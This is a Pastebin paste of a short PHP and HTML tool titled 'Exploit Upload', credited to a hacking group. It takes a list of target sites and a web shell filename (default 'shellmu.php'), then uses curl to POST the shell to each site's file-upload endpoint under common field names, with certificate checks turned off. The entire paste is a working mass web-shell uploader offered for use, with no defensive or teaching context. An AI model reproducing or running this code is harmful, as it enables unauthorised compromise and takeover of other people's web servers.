Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>Exploit Upload</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>© </font><a href=mailto:[email protected]>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post">Your Target :<br><textarea name='sites' cols='45' rows='15'></textarea>
- <br>
- <br>Your Shell : <input type="text" class="input" name="file" size="10" value="shellmu.php"><br>
- Post File : <select name="method">
- <option value="files[]">files[]</option>
- <option value="Filedata">filedata</option>
- <option value="userfile">userfile</option>
- <option value="qqfile">qqfile</option>
- </select><br>
- <input style="background:dodgerblue;margin:0px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" value="EXECUTE" type="submit"><br><br></form></center>
- <?php
- $e=explode("\n",$_POST['sites']);
- $file = $_POST['file'];
- $mepost = $_POST['method'];
- foreach($e as $sites){
- $post = array($mepost => "@$file",
- );
- $ch2 = curl_init ($sites);
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch2, CURLOPT_POST, 1);
- curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch2);
- echo $data."\n\n\n";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement